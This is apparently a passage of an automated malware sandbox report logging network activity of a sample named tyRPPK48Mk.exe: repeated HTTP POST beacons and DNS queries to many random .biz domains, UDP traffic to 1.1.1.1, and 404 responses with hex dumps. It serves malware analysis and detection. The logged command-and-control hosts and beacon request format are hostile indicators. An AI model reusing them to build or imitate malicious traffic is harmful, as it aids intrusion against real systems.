              Source: global trafficHTTP traffic detected: POST /rvdlqpusbvnadr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /jeqvy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /tamvxfmbvljef HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /qruvyya HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ae HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /uwmqwimibwapay HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /lldlbyoesphcqdkf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /apxsujb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /eomxyn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /pmatqnbxrumnnfx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /bnjfyckdmdaodoy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /phssgedc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /phecjisjxfiw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /dxuovgh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /jtyrnesofmrmc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /gorhlmlyitqqsxl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
              Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
              Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
              Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
              Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
              Source: global trafficDNS traffic detected: DNS query: przvgke.biz
              Source: global trafficDNS traffic detected: DNS query: zlenh.biz
              Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
              Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
              Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
              Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
              Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
              Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
              Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
              Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
              Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
              Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
              Source: global trafficDNS traffic detected: DNS query: tbjrpv.biz
              Source: global trafficDNS traffic detected: DNS query: deoci.biz
              Source: global trafficDNS traffic detected: DNS query: gytujflc.biz
              Source: global trafficDNS traffic detected: DNS query: qaynky.biz
              Source: global trafficDNS traffic detected: DNS query: bumxkqgxu.biz
              Source: global trafficDNS traffic detected: DNS query: dwrqljrr.biz
              Source: global trafficDNS traffic detected: DNS query: nqwjmb.biz
              Source: global trafficDNS traffic detected: DNS query: ytctnunms.biz
              Source: global trafficDNS traffic detected: DNS query: myups.biz
              Source: global trafficDNS traffic detected: DNS query: oshhkdluh.biz
              Source: global trafficDNS traffic detected: DNS query: yunalwv.biz
              Source: global trafficDNS traffic detected: DNS query: jpskm.biz
              Source: global trafficDNS traffic detected: DNS query: lrxdmhrr.biz
              Source: global trafficDNS traffic detected: DNS query: wllvnzb.biz
              Source: global trafficDNS traffic detected: DNS query: gnqgo.biz
              Source: global trafficDNS traffic detected: DNS query: jhvzpcfg.biz
              Source: global trafficDNS traffic detected: DNS query: acwjcqqv.biz
              Source: global trafficDNS traffic detected: DNS query: lejtdj.biz
              Source: global trafficDNS traffic detected: DNS query: vyome.biz
              Source: global trafficDNS traffic detected: DNS query: yauexmxk.biz
              Source: global trafficDNS traffic detected: DNS query: iuzpxe.biz
              Source: global trafficDNS traffic detected: DNS query: sxmiywsfv.biz
              Source: global trafficDNS traffic detected: DNS query: vrrazpdh.biz
              Source: global trafficDNS traffic detected: DNS query: ftxlah.biz
              Source: global trafficDNS traffic detected: DNS query: typgfhb.biz
              Source: global trafficDNS traffic detected: DNS query: esuzf.biz
              Source: global trafficDNS traffic detected: DNS query: gvijgjwkh.biz
              Source: global trafficDNS traffic detected: DNS query: qpnczch.biz
              Source: global trafficDNS traffic detected: DNS query: brsua.biz
              Source: global trafficDNS traffic detected: DNS query: dlynankz.biz
              Source: global trafficDNS traffic detected: DNS query: oflybfv.biz
              Source: global trafficDNS traffic detected: DNS query: yhqqc.biz
              Source: global trafficDNS traffic detected: DNS query: mnjmhp.biz
              Source: global trafficDNS traffic detected: DNS query: opowhhece.biz
              Source: global trafficDNS traffic detected: DNS query: zjbpaao.biz
              Source: global trafficDNS traffic detected: DNS query: jdhhbs.biz
              Source: global trafficDNS traffic detected: DNS query: mgmsclkyu.biz
              Source: global trafficDNS traffic detected: DNS query: warkcdu.biz
              Source: global trafficDNS traffic detected: DNS query: gcedd.biz
              Source: global trafficDNS traffic detected: DNS query: jwkoeoqns.biz
              Source: global trafficDNS traffic detected: DNS query: xccjj.biz
              Source: global trafficDNS traffic detected: DNS query: hehckyov.biz
              Source: global trafficDNS traffic detected: DNS query: rynmcq.biz
              Source: global trafficDNS traffic detected: DNS query: uaafd.biz
              Source: global trafficDNS traffic detected: DNS query: eufxebus.biz
              Source: global trafficDNS traffic detected: DNS query: pwlqfu.biz
              Source: global trafficDNS traffic detected: DNS query: rrqafepng.biz
              Source: global trafficDNS traffic detected: DNS query: ctdtgwag.biz
              Source: global trafficDNS traffic detected: DNS query: tnevuluw.biz
              Source: global trafficDNS traffic detected: DNS query: whjovd.biz
              Source: global trafficDNS traffic detected: DNS query: gjogvvpsf.biz
              Source: global trafficDNS traffic detected: DNS query: reczwga.biz
              Source: global trafficDNS traffic detected: DNS query: bghjpy.biz
              Source: global trafficDNS traffic detected: DNS query: damcprvgv.biz
              Source: global trafficDNS traffic detected: DNS query: ocsvqjg.biz
              Source: global trafficDNS traffic detected: DNS query: ywffr.biz
              Source: global trafficDNS traffic detected: DNS query: ecxbwt.biz
              Source: global trafficDNS traffic detected: DNS query: pectx.biz
              Source: global trafficDNS traffic detected: DNS query: zyiexezl.biz
              Source: global trafficDNS traffic detected: DNS query: banwyw.biz
              Source: global trafficDNS traffic detected: DNS query: muapr.biz
              Source: global trafficDNS traffic detected: DNS query: wxgzshna.biz
              Source: global trafficDNS traffic detected: DNS query: zrlssa.biz
              Source: global trafficDNS traffic detected: DNS query: jlqltsjvh.biz
              Source: global trafficDNS traffic detected: DNS query: xyrgy.biz
              Source: global trafficDNS traffic detected: DNS query: htwqzczce.biz
              Source: global trafficDNS traffic detected: DNS query: kvbjaur.biz
              Source: global trafficDNS traffic detected: DNS query: uphca.biz
              Source: global trafficDNS traffic detected: DNS query: fjumtfnz.biz
              Source: global trafficDNS traffic detected: DNS query: hlzfuyy.biz
              Source: global trafficDNS traffic detected: DNS query: rffxu.biz
              Source: global trafficDNS traffic detected: DNS query: cikivjto.biz
              Source: global trafficDNS traffic detected: DNS query: qncdaagct.biz
              Source: global trafficDNS traffic detected: DNS query: shpwbsrw.biz
              Source: global trafficDNS traffic detected: DNS query: cjvgcl.biz
              Source: global trafficDNS traffic detected: DNS query: neazudmrq.biz
              Source: global trafficDNS traffic detected: DNS query: pgfsvwx.biz
              Source: global trafficDNS traffic detected: DNS query: aatcwo.biz
              Source: global trafficDNS traffic detected: DNS query: kcyvxytog.biz
              Source: global trafficDNS traffic detected: DNS query: nwdnxrd.biz
              Source: global trafficDNS traffic detected: DNS query: ereplfx.biz
              Source: global trafficDNS traffic detected: DNS query: ptrim.biz
              Source: global trafficDNS traffic detected: DNS query: znwbniskf.biz
              Source: global trafficDNS traffic detected: DNS query: cpclnad.biz
              Source: unknownHTTP traffic detected: POST /bvjounbjkagqnta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:28:45 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:28:45 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:28:49 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:28:49 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 